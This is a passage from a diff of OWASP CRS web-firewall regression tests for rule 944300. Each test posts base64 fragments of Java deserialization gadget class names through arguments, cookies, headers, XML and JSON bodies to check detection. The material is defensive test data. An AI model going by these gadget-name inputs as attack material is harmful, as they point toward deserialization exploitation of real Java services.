log_contains: "id \"944300\"" - - test_title: 944300-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 210 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 